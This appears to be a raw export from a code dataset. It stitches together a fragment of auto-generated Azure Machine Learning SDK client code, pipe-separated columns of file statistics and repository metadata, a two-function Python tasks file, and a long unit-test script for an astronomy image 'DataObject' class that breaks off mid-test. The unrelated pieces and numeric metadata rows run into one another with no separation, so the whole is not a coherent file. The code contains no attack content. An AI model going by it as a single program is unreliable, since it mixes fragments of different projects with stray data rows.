response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
cancel_run_with_uri_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/cancel'} # type: ignore
@distributed_trace_async
async def cancel_run_with_uri_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
cancelation_reason: Optional[str] = None,
**kwargs: Any
) -> "_models.Run":
"""cancel_run_with_uri_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_name:
:type experiment_name: str
:param cancelation_reason:
:type cancelation_reason: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_cancel_run_with_uri_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
cancelation_reason=cancelation_reason,
template_url=self.cancel_run_with_uri_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
cancel_run_with_uri_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/cancel'} # type: ignore
| 44.293727
| 1,337
| 0.667148
| 11,583
| 106,615
| 5.874471
| 0.024864
| 0.040327
| 0.041223
| 0.018224
| 0.972826
| 0.971122
| 0.969446
| 0.965008
| 0.95957
| 0.954353
| 0
| 0.005671
| 0.250725
| 106,615
| 2,406
| 1,338
| 44.312136
| 0.846114
| 0.089359
| 0
| 0.845517
| 0
| 0.021379
| 0.112286
| 0.085194
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007586
| false
| 0
| 0.009655
| 0
| 0.068276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
af33cc4ddce83ef81d582c39f8fce5c8ba48a833
| 165
|
py
|
Python
|
ploy_app/tasks.py
|
estackhub/ploy_app
|
594c07c866fcfa299f1d7510a4ccaa0b58fe499b
|
[
"MIT"
] | null | null | null |
ploy_app/tasks.py
|
estackhub/ploy_app
|
594c07c866fcfa299f1d7510a4ccaa0b58fe499b
|
[
"MIT"
] | null | null | null |
ploy_app/tasks.py
|
estackhub/ploy_app
|
594c07c866fcfa299f1d7510a4ccaa0b58fe499b
|
[
"MIT"
] | null | null | null |
from ploy_app.ploy_app.allot import validate_files_space_limit, validate_db_space_limit
def daily():
validate_files_space_limit()
validate_db_space_limit()
| 27.5
| 87
| 0.830303
| 25
| 165
| 4.92
| 0.48
| 0.325203
| 0.292683
| 0.373984
| 0.699187
| 0.699187
| 0.699187
| 0.699187
| 0
| 0
| 0
| 0
| 0.109091
| 165
| 6
| 88
| 27.5
| 0.836735
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
af72c609b88d8554a27346d9c774a4297f95ee02
| 87,192
|
py
|
Python
|
DataObjectTest.py
|
renshj/High-Cadence-Processing
|
5d5a2df741858f6e1466d7c4b008e9245d4b780a
|
[
"MIT"
] | null | null | null |
DataObjectTest.py
|
renshj/High-Cadence-Processing
|
5d5a2df741858f6e1466d7c4b008e9245d4b780a
|
[
"MIT"
] | null | null | null |
DataObjectTest.py
|
renshj/High-Cadence-Processing
|
5d5a2df741858f6e1466d7c4b008e9245d4b780a
|
[
"MIT"
] | null | null | null |
#This file was created by Tate Hagan
from EmptyFileException import EmptyFileException #imports the Errors that can be thrown by the Data Object
from IncorrectTypeException import IncorrectTypeException
from NoSliceException import NoSliceException
from InvalidSizeException import InvalidSizeException
from InvalidCoordException import InvalidCoordException
from InvalidZoomFactorException import InvalidZoomFactorException
from InvalidFlagException import InvalidFlagException
from DataObject import DataObject #imports the Data Object to be tested
from Slice import Slice #for testing slice methods
from ZoomObject import ZoomObject #Used for Zoomed
import numpy as np #For ImageData16
from astropy.io import fits #For fits file reading
from astropy import wcs #Used for WCS
import matplotlib.pyplot as plt
#Filepaths are hardcoded, may need to be altered on other systems with different data
pathinit = "D:/Capstone Project/Sprint-2/"
pathlegit = pathinit + "TestData/" #The TestData directory provided by the client
validtle = pathlegit + "3le-2019-12-19-08-40-18.txt"
validfit = pathlegit + "0097-fast-slew-5-sec.fit"
validfits = pathlegit + "97-wcs.fits"
pathnonlegit = pathinit + "Non-Formatted Files/"
emptytext = pathnonlegit + "ex1.txt" #An empty text file
blahtext = pathnonlegit + "ex2.txt" #A text file that just has the word 'blah'
validsnr = 10.0
print("Checking test paths:\nValid TLE:{}\nValid Image:{}\nValid WCS:{}\nEmpty Text:{}".format(validtle, validfit, validfits, emptytext))
tests = 0
successes = 0
failures = 0
print("Testing Data Object constructor")
print("Test constructor when no filename passed in")
try:
tests = tests + 1
data = DataObject("", 'Photoplot', validsnr)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test constructor with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws error:")
print(e)
failures = failures + 1
print("Test constructor with non-formatted fit")
try:
tests = tests + 1
data = DataObject(emptytext, 'Photoplot', validsnr)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except EmptyFileException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test constructor with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'NotAValidFlag', validsnr)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test constructor with non-float SNR")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', "Not a float")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getImageData")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
imgOut = data.getImageData()
with fits.open(validfit) as imghdul: #using the with keyword means that the file will be closed even if an exception is thrown
imgExp = imghdul[0].data
comparison = (imgExp == imgOut)
if(comparison.all()):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(imgExp, imgOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
#We do not space out text for functions with only one test
print("Test getImageData16")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
img16Out = data.getImageData16()
with fits.open(validfit) as imghdul:
img = imghdul[0].data
img16Exp = img.astype(np.int16)
comparison16 = (img16Exp == img16Out)
if(comparison16.all()):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(img16Exp, img16Out))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getImageHeader")
try:
tests = tests + 1
data = DataObject(validfit, 'Photoplot', validsnr)
imgHeaderOut = data.getImageHeader()
with fits.open(validfit) as imghdul:
imgHeaderExp = imghdul[0].header
if(imgHeaderExp == imgHeaderOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(imgHeaderExp, imgHeaderOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getFlag")
try:
tests = tests + 1
flagExp = 'Publication'
data = DataObject(validfit, flagExp, validsnr)
flagOut = data.getFlag()
if(flagExp == flagOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(flagExp, flagOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getSNR")
try:
tests = tests + 1
snrExp = 5.0
data = DataObject(validfit, 'Publication', snrExp)
snrOut = data.getSNR()
if(snrExp == snrOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(snrExp, snrOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setCandGt")
print("Test setCandGt with valid input")
try:
tests = tests + 1
correctField0 = np.array([1,2,3]).astype(np.int64)
correctField1 = np.array([4,5,6]).astype(np.int64)
correctField = (correctField0, correctField1)
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setCandGt(correctField)
print("SUCCESS-No crash")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setCandGt with non-tuple")
try:
tests = tests + 1
nontuple = 7
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setCandGt(nontuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandGt with wrong number of tuple elements")
try:
tests = tests + 1
element0 = np.array([1,2]).astype(np.int64)
element1 = np.array([2,3]).astype(np.int64)
element2 = np.array([3,4]).astype(np.int64)
wrongElementTuple = (element0, element1, element2)
data = DataObject(validfit, 'CheckPixels', validsnr)
data.setCandGt(wrongElementTuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidSizeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandGt with non-array elements")
try:
tests = tests + 1
wrongElementTypeTuple = (1,2)
data = DataObject(validfit, 'Orbits', validsnr)
data.setCandGt(wrongElementTypeTuple)
print("FAILURE-Doesn't throw error")
failures = failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandGt with array elements of incorrect type")
try:
tests = tests + 1
wrongType0 = np.array([1,2,3]) #No cast to int64
wrongType1 = np.array([4,5,6])
wrongtypetuple = (wrongType0, wrongType1)
data = DataObject(validfit, 'Simulate', validsnr)
data.setCandGt(wrongtypetuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandGt with unequal array lengths")
try:
tests = tests + 1
arr0 = np.array([1,2,3]).astype(np.int64)
arr1 = np.array([4]).astype(np.int64)
unequalArraysTuple = (arr0, arr1)
data = DataObject(validfit, 'Simulate', validsnr)
data.setCandGt(unequalArraysTuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidSizeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCandGt")
try:
tests = tests + 1
candGtExp0 = np.array([1,2,3]).astype(np.int64)
candGtExp1 = np.array([4,5,6]).astype(np.int64)
candGtExp = (candGtExp0, candGtExp1)
data = DataObject(validfit, 'Publication', validsnr)
data.setCandGt(candGtExp)
candGtOut = data.getCandGt()
if(candGtExp == candGtOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(candGtExp, candGtOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setCandLt")
print("Test setCandLt with valid input")
try:
tests = tests + 1
correctField0 = np.array([1,2,3]).astype(np.int64)
correctField1 = np.array([4,5,6]).astype(np.int64)
correctField = (correctField0, correctField1)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(correctField)
print("SUCCESS-No crash")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setCandLt with non-tuple")
try:
tests = tests + 1
nontuple = 7
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(nontuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandLt with wrong number of tuple elements")
try:
tests = tests + 1
element0 = np.array([1,2]).astype(np.int64)
element1 = np.array([2,3]).astype(np.int64)
element2 = np.array([3,4]).astype(np.int64)
wrongElementTuple = (element0, element1, element2)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(wrongElementTuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidSizeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandLt with non-array elements")
try:
tests = tests + 1
wrongElementTypeTuple = (1,2)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(wrongElementTypeTuple)
print("FAILURE-Doesn't throw error")
failures = failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandLt with array elements of incorrect type")
try:
tests = tests + 1
wrongType0 = np.array([1,2,3]) #No cast to int64
wrongType1 = np.array([4,5,6])
wrongtypetuple = (wrongType0, wrongType1)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(wrongtypetuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setCandLt with unequal array lengths")
try:
tests = tests + 1
arr0 = np.array([1,2,3]).astype(np.int64)
arr1 = np.array([4]).astype(np.int64)
unequalArraysTuple = (arr0, arr1)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(unequalArraysTuple)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidSizeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCandLt")
try:
tests = tests + 1
candLtExp0 = np.array([1,2,3]).astype(np.int64)
candLtExp1 = np.array([4,5,6]).astype(np.int64)
candLtExp = (candLtExp0, candLtExp1)
data = DataObject(validfit, 'Photoplot', validsnr)
data.setCandLt(candLtExp)
candLtOut = data.getCandLt()
if(candLtExp == candLtOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(candLtExp, candLtOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setImgStd")
print("Test setImgStd with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
data.setImgStd(np.float64(10))
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setImgStd with invalid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
data.setImgStd("Not a float64")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getImgStd")
print("Test getImgStd with valid conditions")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
imgStdExp = np.float64(10)
data.setImgStd(imgStdExp)
imgStdOut = data.getImgStd()
if(imgStdExp == imgStdOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(imgStdExp, imgStdOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setDiffImg")
print("Test setDiffImg with valid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
arr = np.array([1,2,3])
data.setDiffImg(arr)
print("SUCCESS-Doesn't throw error")
successes = successes + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setDiffImg with invalid input")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
data.setDiffImg("Not an ndarray")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getDiffImg")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication', validsnr)
diffImgExp = np.array([1,2,3])
data.setDiffImg(diffImgExp)
diffImgOut = data.getDiffImg()
comparison = (diffImgExp == diffImgOut)
if(comparison.all()):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(diffImgExp, diffImgOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
#Test Photoplot functions
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setSlice")
print("Test setSlice with valid input")
try:
tests = tests + 1
slice1 = Slice(20,30,"Slice1",10, 600.0)
slice2 = Slice(40,50,"Slice2",15, 450.0)
slice3 = Slice(60,70,"Slice3",20, 230.0)
slicesExp = []
slicesExp.append(slice1)
slicesExp.append(slice2)
slicesExp.append(slice3)
data = DataObject(validfit,'Photoplot', validsnr)
data.setSlice(20,30,"Slice1",10, 600.0)
data.setSlice(40,50,"Slice2",15, 450.0)
data.setSlice(60,70,"Slice3",20, 230.0)
slicesOut = data.getSliceList()
equal = False
if(len(slicesExp) == len(slicesOut)):
equal = True
ii = 0
while( (ii < len(slicesExp)) and equal):
if(not(slicesExp[ii].equals(slicesOut[ii]))):
equal = False
ii = ii + 1
if(equal):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
slicesExpString = []
for jj in range(len(slicesExp)): #iterates from jj=0 to kk=len(slicesExp)-1
sliceExp = slicesExp[ii]
slicesExpString.append(sliceExp.toString)
slicesOutString = []
for kk in range(len(slicesOut)):
sliceOut = slicesOut[ii]
slicesOutString.append(sliceOut.toString)
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(slicesExpString, slicesOutString))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setSlice with non-integer x")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot', validsnr)
data.setSlice("x",30,"Slice",5, 600.0)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSlice with non-integer y")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot', validsnr)
data.setSlice(20,"y","Slice",3, 450.0)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSlice with non-integer width")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot', validsnr)
data.setSlice(20,30,"Slice","width", 300.0)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSlice with non-float brightness")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSlice(20,30,"Slice",5,"Brightness")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSlice with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit,'Publication',validsnr)
data.setSlice(20,30,"Slice",5,300.0)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getCurrSlice")
print("Test getCurrSlice with valid conditions")
try:
tests = tests + 1
sliceExp = Slice(10,20,"Slice",5, 600.0)
data = DataObject(validfit,'Photoplot',validsnr)
data.setSlice(10,20,"Slice",5, 600.0)
sliceOut = data.getCurrSlice()
sliceExpString = sliceExp.toString()
sliceOutString = sliceOut.toString()
if(sliceExpString == sliceOutString):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(sliceExpString,sliceOutString))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test getCurrSlice with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit,'Publication',validsnr)
sliceOut = data.getCurrSlice()
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setSliceYl")
print("Test setSliceYl with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
sliceYlExp = 15
data.setSlice(20,40,"SliceTest",5,600.0)
data.setSliceYl(sliceYlExp)
sliceOut = data.getCurrSlice()
sliceYlOut = sliceOut.getYl()
if(sliceYlExp == sliceYlOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted:{}".format(sliceYlExp, sliceYlOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setSliceYl with no Slice created")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSliceYl(25)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except NoSliceException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceYl with non-integer yl")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSlice(20,30,"Slice",5,600.0)
data.setSliceYl("yl")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceYl with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit,'Publication',validsnr)
data.setSliceYl(7)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setSliceYh")
print("Test setSliceYh with valid input")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
sliceYhExp = 55
data.setSlice(30,50,"SliceTest",5,600.0)
data.setSliceYh(sliceYhExp)
sliceOut = data.getCurrSlice()
sliceYhOut = sliceOut.getYh()
if(sliceYhExp == sliceYhOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected:{}\nOutputted{}".format(sliceYhExp,sliceYhOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setSliceYh with no Slice created")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSliceYh(50)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except NoSliceException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceYh with non-integer yh")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSlice(20,30,"Slice",5,600.0)
data.setSliceYh("yh")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceYh with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
data.setSliceYh(3)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a function with multiple tests
print("Test setSliceBrightnessDiff")
print("Test setSliceBrightnessDiff with valid input")
try:
tests = tests + 1
sliceTest = Slice(40,70,"SliceTest",3,600.0)
data = DataObject(validfit,'Photoplot',validsnr)
sliceBrightnessDiffExp = 25
data.setSlice(40,70,"SliceTest",3,600.0)
data.setSliceBrightnessDiff(sliceBrightnessDiffExp)
sliceOut = data.getCurrSlice()
sliceBrightnessDiffOut = sliceOut.getBrightnessDiff()
if(sliceBrightnessDiffExp == sliceBrightnessDiffOut):
print("SUCCESS-Correct value outputted")
successes = successes + 1
else:
print("FAILURE-Incorrect value outputted\nExpected{}\nOutputted:{}".format(sliceBrightnessDiffExp,sliceBrightnessDiffOut))
failures = failures + 1
except Exception as e:
print("FAILURE-An error occurred:")
print(e)
failures = failures + 1
print("Test setSliceBrightnessDiff with no Slice created")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSliceBrightnessDiff(30)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except NoSliceException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceBrightnessDiff with non-integer brightnessDiff")
try:
tests = tests + 1
data = DataObject(validfit,'Photoplot',validsnr)
data.setSlice(20,30,"Slice",5,600.0)
data.setSliceBrightnessDiff("BrightnessDiff")
print("FAILURE-Doesn't throw error")
failures = failures + 1
except IncorrectTypeException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("Test setSliceBrightnessDiff with invalid flag")
try:
tests = tests + 1
data = DataObject(validfit, 'Publication',validsnr)
data.setSliceBrightnessDiff(3)
print("FAILURE-Doesn't throw error")
failures = failures + 1
except InvalidFlagException:
print("SUCCESS-Throws correct error")
successes = successes + 1
except Exception as e:
print("FAILURE-Throws a different error:")
print(e)
failures = failures + 1
print("-----------------------") #Spaces out text as we are now testing a different function
print("Test getSliceList")
print("Test getSliceList with valid conditions")
try:
tests = tests + 1
slicesExp = []
data = DataObject(validfit, 'Photoplot',validsnr)
slicesOut = data.getSliceList()
if(slicesExp == slicesOut):
